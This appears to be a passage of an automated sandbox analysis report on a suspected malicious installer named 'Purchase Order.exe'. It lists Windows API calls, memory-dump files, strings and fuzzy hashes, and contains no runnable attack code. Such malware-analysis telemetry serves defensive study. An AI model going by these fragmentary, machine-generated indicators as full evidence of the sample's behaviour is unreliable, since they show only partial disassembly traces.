                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                  • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                  • String ID: F
                                                                                                  • API String ID: 941294808-1304234792
                                                                                                  • Opcode ID: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                                                                  • Instruction ID: f6076547c65416f673289c9e9aa760257b54fe90aa12de16c0a46004740ece36
                                                                                                  • Opcode Fuzzy Hash: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                                                                  • Instruction Fuzzy Hash: C2419B71804249AFCF058FA4CD459AFBBB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                                                                  APIs
                                                                                                  • lstrcpyA.KERNEL32(00421AC0,NUL,?,00000000,?,00000000,00405DD3,?,?), ref: 00405C4F
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405DD3,?,?), ref: 00405C73
                                                                                                  • GetShortPathNameA.KERNEL32(?,00421AC0,00000400), ref: 00405C7C
                                                                                                    • Part of subcall function 00405ACF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ADF
                                                                                                    • Part of subcall function 00405ACF: lstrlenA.KERNEL32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11
                                                                                                  • GetShortPathNameA.KERNEL32(00421EC0,00421EC0,00000400), ref: 00405C99
                                                                                                  • wsprintfA.USER32 ref: 00405CB7
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00421EC0,C0000000,00000004,00421EC0,?,?,?,?,?), ref: 00405CF2
                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405D01
                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D39
                                                                                                  • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216C0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D8F
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00405DA0
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405DA7
                                                                                                    • Part of subcall function 00405B6A: GetFileAttributesA.KERNELBASE(00000003,00402D8D,C:\Users\user\Desktop\Purchase Order.exe,80000000,00000003), ref: 00405B6E
                                                                                                    • Part of subcall function 00405B6A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                  • String ID: %s=%s$NUL$[Rename]
                                                                                                  • API String ID: 222337774-4148678300
                                                                                                  • Opcode ID: 13050e4631be9f4a8a8c31851d4856950631349ab05fbd5c9e4b7c65e501b528
                                                                                                  • Instruction ID: 58b8e60db813422e8a8f05baf12fe1cb7cc397f7baf35d3febd204dd1aeecf15
                                                                                                  • Opcode Fuzzy Hash: 13050e4631be9f4a8a8c31851d4856950631349ab05fbd5c9e4b7c65e501b528
                                                                                                  • Instruction Fuzzy Hash: D031C271A04B596BD2202B219D49F6B3A6CDF85754F18003BF901F62D2E67CA8018EAD
                                                                                                  APIs
                                                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase Order.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061BA
                                                                                                  • CharNextA.USER32(?,?,?,00000000), ref: 004061C7
                                                                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\Purchase Order.exe",75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061CC
                                                                                                  • CharPrevA.USER32(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000,0040329A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034AF), ref: 004061DC
                                                                                                  Strings
                                                                                                  • "C:\Users\user\Desktop\Purchase Order.exe", xrefs: 0040619E
                                                                                                  • *?|<>/":, xrefs: 004061AA
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00406163
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Char$Next$Prev
                                                                                                  • String ID: "C:\Users\user\Desktop\Purchase Order.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 589700163-4040796691
                                                                                                  • Opcode ID: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                                                                                  • Instruction ID: 28f88d73301ddfe76a8902f897fcc58808f561dcfc6ac49559e28e986a88295b
                                                                                                  • Opcode Fuzzy Hash: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                                                                                  • Instruction Fuzzy Hash: AF11C8718083912DFB3216644C44B777F998F9A760F19007BE9D6762C3C67C5C53826D
                                                                                                  APIs
                                                                                                  • GetWindowLongA.USER32(?,000000EB), ref: 00404160
                                                                                                  • GetSysColor.USER32(00000000), ref: 0040417C
                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00404188
                                                                                                  • SetBkMode.GDI32(?,?), ref: 00404194
                                                                                                  • GetSysColor.USER32(?), ref: 004041A7
                                                                                                  • SetBkColor.GDI32(?,?), ref: 004041B7
                                                                                                  • DeleteObject.GDI32(?), ref: 004041D1
                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 004041DB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2320649405-0
                                                                                                  • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                  • Instruction ID: 7122de99037e03f190bb62226e04253736cb74e6c142f140589d3e5d77d1f23d
                                                                                                  • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                  • Instruction Fuzzy Hash: DB21A4B5804704ABCB219F78DD08B5BBBF8AF41714F048629E995E62E0C734E944CB55
                                                                                                  APIs
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                                                    • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2762281649.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2762228322.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762310776.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762334808.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                  • String ID:
                                                                                                  • API String ID: 3730416702-0
                                                                                                  • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                                  • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                                                  • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                                  • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                                                  APIs
                                                                                                    • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                  • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2762281649.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2762228322.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762310776.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2762334808.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Free$Alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1780285237-0
                                                                                                  • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                  • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                                                  • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                                                  • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                                                  APIs
                                                                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402CC3
                                                                                                  • GetTickCount.KERNEL32 ref: 00402CE1
                                                                                                  • wsprintfA.USER32 ref: 00402D0F
                                                                                                    • Part of subcall function 00405110: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
                                                                                                    • Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                                                                                    • Part of subcall function 00405110: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00402D22,00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,00000000,00000000,00000000), ref: 0040516C
                                                                                                    • Part of subcall function 00405110: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll), ref: 0040517E
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402C13,00000000), ref: 00402D33
                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402D41
                                                                                                    • Part of subcall function 00402C8F: MulDiv.KERNEL32(0002C54F,00000064,0002E638), ref: 00402CA4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                  • String ID: ... %d%%
                                                                                                  • API String ID: 722711167-2449383134
                                                                                                  • Opcode ID: 78a221e97a99680450e3ca11bf4e3b45821cb4013d8a2558b5166950edff25d0
                                                                                                  • Instruction ID: 547fa0e596d0efa3134ade0ba199646732fee1a7f54f1ab5f8be41358a9578df
                                                                                                  • Opcode Fuzzy Hash: 78a221e97a99680450e3ca11bf4e3b45821cb4013d8a2558b5166950edff25d0
                                                                                                  • Instruction Fuzzy Hash: DC019BB0906614E7EB21BB64EF0DEDE766CEB04701B444037F405B11E5C7B89941D79E
                                                                                                  APIs
                                                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049F6
                                                                                                  • GetMessagePos.USER32 ref: 004049FE
                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404A18
                                                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A2A
                                                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A50
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                  • String ID: f
                                                                                                  • API String ID: 41195575-1993550816
                                                                                                  • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                  • Instruction ID: 2232a7e87341d92c9ad346ae082ec06308d60ff2d87fc7f715a57a5a5eae5b25
                                                                                                  • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                  • Instruction Fuzzy Hash: E5018071E40219BADB00DB94CC41BFEBBB8AB45711F10412BBA10B61C0D7B465018BA5
                                                                                                  APIs
                                                                                                  • GetDC.USER32(?), ref: 00401D98
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB2
                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DBA
                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DCB
                                                                                                  • CreateFontIndirectA.GDI32(0040A808), ref: 00401E1A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                  • String ID: Calibri
                                                                                                  • API String ID: 3808545654-1409258342
                                                                                                  • Opcode ID: 7163b3b0dcdfa28c572866efb14d0ddf6d6d7c1142750631c0734f8fd9b33859
                                                                                                  • Instruction ID: 31dc6bfce766dd2e9c365b6b9c1ce0fa0646d0edadaed3ffd0317ad467dc8ee1
                                                                                                  • Opcode Fuzzy Hash: 7163b3b0dcdfa28c572866efb14d0ddf6d6d7c1142750631c0734f8fd9b33859
                                                                                                  • Instruction Fuzzy Hash: 1E017572948340AFE7006B74AE4EB993FF4DB95315F10847AF201B62E2C6B905528F6E
                                                                                                  APIs
                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C2E
                                                                                                  • wsprintfA.USER32 ref: 00402C62
                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00402C72
                                                                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402C84
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                  • API String ID: 1451636040-1158693248
                                                                                                  • Opcode ID: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
                                                                                                  • Instruction ID: e0e458c2d16b5d3c5a169a1492fe07981551179f6e5c56f92d0567975436b572
                                                                                                  • Opcode Fuzzy Hash: ef5ff3cba37bdb2e26199f17b8c5be3437539e0f0002abd4d10d443ac5288961
                                                                                                  • Instruction Fuzzy Hash: 35F0317090420DABEF205F60CD0AFAE3769EB04345F00C43AFA16B51D0D7B99A55CB59
                                                                                                  APIs
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027B9
                                                                                                  • GlobalFree.KERNEL32(?), ref: 004027F2
                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402805
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040281D
                                                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402831
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 2667972263-0
                                                                                                  • Opcode ID: 7d68071d91978c31b4045b951977b232c33a3f1e4c4fbf1767583406490216b2
                                                                                                  • Instruction ID: 589acf511f7bba285ed25554ef0f071862dbcd9cf46fffc414e4c77000f41e55
                                                                                                  • Opcode Fuzzy Hash: 7d68071d91978c31b4045b951977b232c33a3f1e4c4fbf1767583406490216b2
                                                                                                  • Instruction Fuzzy Hash: 5E219A71C04128BBCF216FA5CE89DAE7A79AF09324F14423AF520762E1C6795D40DBA9
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(Nonbeneficial Setup: Installing,Nonbeneficial Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047EC,000000DF,00000000,00000400,?), ref: 0040496F
                                                                                                  • wsprintfA.USER32 ref: 00404977
                                                                                                  • SetDlgItemTextA.USER32(?,Nonbeneficial Setup: Installing), ref: 0040498A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
